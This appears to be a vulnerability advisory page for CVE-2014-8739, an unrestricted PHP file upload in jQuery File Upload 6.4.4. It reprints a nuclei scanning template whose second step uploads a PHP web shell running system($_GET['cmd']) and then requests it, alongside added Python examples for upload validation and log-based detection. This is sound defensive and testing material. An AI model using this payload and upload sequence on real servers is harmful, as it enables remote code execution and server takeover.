jQuery File Upload 6.4.4 - Unrestricted File Upload

Vulnerability Information

Vulnerability name: jQuery File Upload 6.4.4 - Unrestricted File Upload

Vulnerability ID:

  • CVE: CVE-2014-8739

Vulnerability type: File upload

Severity: Critical

Description: jQuery File Upload is a widely used file upload plugin that supports multi-file upload, drag-and-drop upload and similar features, and is common in all kinds of web applications. Because of its ease of use and flexibility it is widely deployed in enterprise services and in ordinary web application components.

This vulnerability is a file upload flaw. Specifically, server/php/UploadHandler.php does not effectively validate the type of uploaded files, so a remote attacker can upload arbitrary PHP files. By uploading a malicious file with a PHP extension and then requesting it directly, the attacker can execute arbitrary PHP code. The technical root cause is that the server side does not strictly check the type and content of uploaded files, which allows dangerous files to be uploaded and executed.

Successful exploitation can lead to remote code execution, giving the attacker full control of the affected web application and server. Because no authentication is required and the attack can be automated, the risk is extremely high. An attacker can use it to steal sensitive data, disrupt services or pivot further into the internal network, posing a serious threat to organizations and users.
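The root cause above is a type check that accepts any filename. As an added example (not code from this page or from the jQuery File Upload project), the following Python puts an accept-everything check next to a hardened allowlist check of the kind the remediation calls for. It is written in Python rather than the plugin's PHP so it runs stand-alone; the function names, the extension sets and the magic-byte table are this example's own assumptions, not values taken from the plugin.

```python
import re

# Extensions that common PHP deployments will execute when requested directly.
# Constructed list for this example; extend it to match the server's handlers.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

# Allowlist of upload types this example permits (assumption: an image-only upload).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes each allowed type must start with, so name and content must agree.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def vulnerable_accept(filename: str) -> bool:
    """Accept-anything check modelled on the missing validation described above
    (constructed for this example): any non-empty name passes, including shell.php."""
    return re.fullmatch(r".+", filename, re.IGNORECASE) is not None


def hardened_accept(filename: str, data: bytes) -> tuple:
    """Allowlist check. Returns (accepted, reason).

    Every dotted segment of the name is inspected (Apache's AddHandler can run
    x.php.jpg), the final extension must be on the allowlist, and the content must
    begin with that type's magic bytes."""
    # Keep only the base name: the client-supplied name may carry ../ or C:\ parts.
    name = re.split(r"[\\/]", filename)[-1]
    # Trailing dots/spaces and control characters (null-byte tricks) are rejected outright.
    if name != name.rstrip(". ") or any(ord(c) < 32 for c in name):
        return False, "suspicious characters in filename"
    parts = name.lower().split(".")
    # Also rejects dotfiles such as .htaccess, which can change how the directory is served.
    if len(parts) < 2 or parts[0] == "":
        return False, "missing base name or extension"
    exts = parts[1:]
    for ext in exts:
        if ext in EXECUTABLE_EXTENSIONS:
            return False, f"executable extension .{ext}"
    final = exts[-1]
    if final not in ALLOWED_EXTENSIONS:
        return False, f"extension .{final} not on allowlist"
    if not data.startswith(MAGIC[final]):
        return False, f"content does not match .{final}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample uploads: a PHP file, a double-extension file and a real JPEG header.
    samples = [
        ("shell.php", b"<?php echo 1; ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
        ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ]
    for fname, content in samples:
        print(fname, "vulnerable:", vulnerable_accept(fname), "hardened:", hardened_accept(fname, content))
```

The check is deliberately on the server side and independent of the Content-Type header, which the client controls. Pair it with storing uploads outside the web root or in a directory the server is configured not to execute scripts from, as the remediation section notes.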

Vendor: jquery_file_upload_project

Product: jQuery File Upload

Affected versions: 6.4.4

Source: https://github.com/projectdiscovery/nuclei-templates/blob/e4e6b3c82e8b071aee880251a4ba0f6ee700207d/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: |
    jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve,cve2014,edb,file-upload,intrusive,jquery,kev,rce

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists and identify jQuery File Upload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":\s*\[\]'
        part: body

      - type: word
        part: body
        words:
          - "files"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file with specific jQuery File Upload response patterns
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
        part: body

      - type: word
        part: body
        words:
          - "files"
          - "{{randstr}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible and contains our unique payload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950
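
The three requests in the template (probe the upload endpoint, POST a .php file, GET it back from /server/php/files/) leave a recognisable trace in web server access logs. As an added example for the defender side, not part of the nuclei template or of this page, the Python below parses constructed Combined Log Format lines and raises an alert for every request of an executable file under the upload directory, escalating the rule name when the same client POSTed to the upload endpoint shortly before. The endpoint and upload-directory paths come from the template; the log lines, client addresses, rule names, extension set and the 300-second window are this example's own assumptions.

```python
import re
from datetime import datetime

# Paths as used by the template above; the extension set is an assumption of this example.
UPLOAD_ENDPOINT = "/server/php/"
UPLOAD_DIR = "/server/php/files/"
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Combined Log Format: client ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log, not real traffic: one upload-then-request sequence,
# one benign image upload, and one bare probe with no preceding upload.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Jul/2025:10:00:01 +0000] "GET /server/php/ HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.10 - - [30/Jul/2025:10:00:02 +0000] "POST /server/php/ HTTP/1.1" 200 118 "-" "Mozilla/5.0"
203.0.113.10 - - [30/Jul/2025:10:00:03 +0000] "GET /server/php/files/abcd1234.php HTTP/1.1" 200 8 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Jul/2025:10:05:00 +0000] "POST /server/php/ HTTP/1.1" 200 140 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Jul/2025:10:05:04 +0000] "GET /server/php/files/holiday.jpg HTTP/1.1" 200 53211 "-" "Mozilla/5.0"
192.0.2.5 - - [30/Jul/2025:11:30:00 +0000] "GET /server/php/files/test.php?probe=1 HTTP/1.1" 404 196 "-" "curl/8.0"
""".splitlines()


def parse(line: str):
    """Return the fields detection needs, or None for lines not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop the query string before checking the extension
        "status": int(m["status"]),
    }


def extension(path: str) -> str:
    """Lower-cased final extension of the last path segment, or '' if it has none."""
    base = path.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def detect(lines, window_seconds: int = 300) -> list:
    """Scan lines in order and return one alert per request for an executable file
    under the upload directory. Rule 'upload-then-request' fires when the same client
    had a successful POST to the upload endpoint within window_seconds beforehand;
    otherwise the weaker 'executable-under-upload-dir' fires (e.g. a scanner probe)."""
    alerts = []
    last_post = {}  # client ip -> timestamp of its most recent accepted upload POST
    for rec in filter(None, map(parse, lines)):
        if rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT and rec["status"] == 200:
            last_post[rec["ip"]] = rec["ts"]
            continue
        if not rec["path"].startswith(UPLOAD_DIR) or extension(rec["path"]) not in EXECUTABLE_EXTENSIONS:
            continue
        prev = last_post.get(rec["ip"])
        correlated = prev is not None and 0 <= (rec["ts"] - prev).total_seconds() <= window_seconds
        alerts.append({
            "rule": "upload-then-request" if correlated else "executable-under-upload-dir",
            "ip": rec["ip"],
            "path": rec["path"],
            "status": rec["status"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

A 200 on the correlated rule means the upload directory both accepted and served a script, which is the condition the template's third step confirms; a 404 on the weaker rule is still worth recording, since it shows the endpoint is being probed. Either way the durable fix is the server-side allowlist plus a no-execute policy on the upload directory, and this rule only tells you when that fix is missing or being tested.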


http://example.com/2025/07/30/github_919758539/
Author
lianccc
Published on
July 30, 2025
License